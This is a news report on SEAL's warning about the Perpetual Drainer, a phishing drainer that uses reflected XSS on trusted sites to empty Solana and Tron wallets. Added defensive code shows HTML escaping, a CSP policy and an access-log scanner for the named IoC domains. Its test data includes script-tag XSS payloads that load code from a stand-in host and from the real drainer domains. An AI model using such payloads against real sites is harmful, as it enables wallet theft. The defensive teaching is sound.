Security Alliance Warns of a More Dangerous Perpetual Crypto Drainer

Security Alliance

Cryptoasset security experts have found a new ongoing phishing campaign that targets cryptoasset users' wallets and is able to bypass traditional mitigations.

Security Alliance (SEAL) said it has identified a threat actor, Perpetual Drainer, that is specifically targeting users of the Solana (SOL) and Tron (TRX) blockchains.

According to the experts, the drainer is exploiting cross-site scripting (XSS) vulnerabilities to trick victims into believing that a legitimate website is requesting a transaction.

"This both bypasses many traditional mitigations implemented by wallets but also is more likely to convince a user to approve a transaction," SEAL emphasized.

They've explained that the drainer is using an affiliate model, meaning that the criminals behind the Perpetual Drainer develop the software and host the back-office infrastructure. Meanwhile, the affiliates deploy the drainer software and host the front-office infrastructure.

"In exchange for receiving the software to deploy, affiliates pay a portion of all stolen proceeds to the developers," SEAL added.

According to them, this drainer is unique in how it bypasses usual security mitigations implemented by wallets.

"Typically, when a user visits a website hosting a drainer, the wallet will receive a request from the malicious origin (for example, airdrop-contosocoin.com). However, when a victim visits a website hosting Perpetual Drainer, the wallet will receive a request from a trusted origin (for example, contoso.org)," they added.

SEAL explains that this is possible because the drainer redirects victims to a reflected XSS exploit on a trusted origin. Afterward, the drainer loads a script from the Perpetual Drainer infrastructure that contains the actual drainer logic, allowing the code to execute and rewrite the Document Object Model (DOM). This allows it to "display a wallet connection prompt and cause all requests to the wallet extension to originate from the trusted origin rather than the malicious origin."
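The mechanism SEAL describes hinges on a reflected XSS sink on the trusted site: a request parameter is written into the page as raw HTML, so a crafted value is parsed as markup and any script it references runs with the trusted origin's identity. The following is an added example, not code from SEAL or from any site named in the article; the `/search`-style endpoint, the `q` parameter and the `drainer.invalid` hostname are assumptions. It places the vulnerable rendering pattern beside the hardened one and adds the Content-Security-Policy a site owner would want as a second line of defence, since a policy of `script-src 'self'` makes the browser refuse an injected external script even when an escaping bug slips through.

```javascript
// Added example (not from SEAL or any site in the article): a reflected-XSS
// sink on a trusted origin beside its hardened form. Endpoint, parameter and
// hostnames are assumptions made for illustration.

// Vulnerable: the user-supplied query is interpolated into HTML unescaped, so
// a value containing markup becomes part of the page served by this origin.
function renderSearchVulnerable(query) {
  return `<h1>Results for ${query}</h1>`;
}

// Output encoding for HTML text context: the five characters that can end
// a text node or an attribute value are replaced by entities.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: the same template, but the value stays text.
function renderSearchHardened(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// Defence in depth: with script-src limited to 'self' (no 'unsafe-inline' and
// no third-party hosts), an injected <script src="https://other.invalid/..">
// is blocked by the browser regardless of how it got into the page.
function securityHeaders() {
  return {
    "Content-Security-Policy":
      "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'; frame-ancestors 'none'",
    "X-Content-Type-Options": "nosniff",
  };
}

// Constructed probe: a value that would load an external script if reflected raw.
const PROBE = '<script src="https://drainer.invalid/x.js"></script>';

// True when the rendered output no longer contains a script tag.
function probeIsNeutralized(rendered) {
  return !/<script/i.test(rendered);
}

// Stand-alone demonstration.
console.log("vulnerable neutralized:", probeIsNeutralized(renderSearchVulnerable(PROBE)));
console.log("hardened neutralized:  ", probeIsNeutralized(renderSearchHardened(PROBE)));
console.log(renderSearchHardened(PROBE));
```

The escaping function covers HTML text and double-quoted attribute contexts; values placed into URLs, JavaScript, or CSS need the encoder for that context instead, and a templating engine with contextual auto-escaping is the safer default. The CSP shown is strict enough to break sites that rely on inline scripts or third-party CDNs, so it is usually rolled out first in `Content-Security-Policy-Report-Only` mode.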

The security experts say they're working with industry partners to identify, notify, and display temporary warnings on sites being exploited by Perpetual Drainer.

In the meantime, they recommend developers implement best practices to mitigate XSS attacks and review their access logs for Indicators of Compromise (IoCs) such as oncloudcdn[.]net, cloudapiroute[.]net, and exchangeart[.]net, because the malicious script will likely be visible within the request path or query parameters.
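SEAL's log-review advice can be scripted: parse each access-log line, fully percent-decode the request target (a reflected payload is usually URL-encoded, sometimes more than once) and flag any request whose path, query string, or referer mentions one of the published domains. The following scanner is an added example, not a SEAL tool; the combined log format it parses is the common Apache/nginx layout, and the three sample log lines, including their addresses and timestamps, are constructed for the demonstration. The IoC domains are the ones named in the article.

```javascript
// Added example (not a SEAL tool): flag access-log requests that reference the
// Perpetual Drainer infrastructure named in the advisory. Sample log lines
// below are constructed; the domain list comes from the article.

const IOC_DOMAINS = ["oncloudcdn.net", "cloudapiroute.net", "exchangeart.net"];

// Combined log format:
// client ident user [time] "METHOD target PROTO" status bytes "referer" "user-agent"
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"/;

// Decode percent-encoding until it stops changing (bounded to three rounds),
// so a payload that was encoded twice is still seen in clear.
function fullyDecode(s) {
  let prev = s;
  for (let i = 0; i < 3; i++) {
    let cur;
    try { cur = decodeURIComponent(prev); } catch (e) { break; } // malformed %xx: keep last good value
    if (cur === prev) break;
    prev = cur;
  }
  return prev;
}

// Which published domains appear in the given text (case-insensitive).
function findIocs(text) {
  const hay = text.toLowerCase();
  return IOC_DOMAINS.filter((d) => hay.includes(d));
}

// Parse one combined-format line into fields, or null if it does not match.
function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { client: m[1], time: m[2], method: m[3], target: m[4],
           status: Number(m[5]), referer: m[6], userAgent: m[7] };
}

// Return every request whose decoded target or referer names an IoC domain.
function scanAccessLog(lines) {
  const hits = [];
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec) continue;
    const decodedTarget = fullyDecode(rec.target);
    const iocs = findIocs(decodedTarget + " " + fullyDecode(rec.referer));
    if (iocs.length > 0) hits.push({ ...rec, decodedTarget, iocs });
  }
  return hits;
}

// Constructed sample: one benign search, one single-encoded and one
// double-encoded request carrying a script tag that points at IoC domains.
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Mar/2024:12:00:01 +0000] "GET /search?q=wallet HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [10/Mar/2024:12:00:07 +0000] "GET /search?q=%3Cscript%20src%3D%22https%3A%2F%2Foncloudcdn.net%2Fa.js%22%3E%3C%2Fscript%3E HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [10/Mar/2024:12:01:13 +0000] "GET /page/%253Cscript%2520src%253D%2522https%253A%252F%252Fcloudapiroute.net%252Fb.js%2522%253E HTTP/1.1" 404 256 "-" "curl/8.0"',
];

console.log(JSON.stringify(scanAccessLog(SAMPLE_LOG), null, 2));
```

A hit with a 200 status on a page that echoes its parameters is the one to look at first, since that is the combination the drainer needs; a 404 still shows someone probing for the sink. Pipe real logs in with `fs.readFileSync(path, "utf8").split("\n")` and extend `IOC_DOMAINS` as new infrastructure is published.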
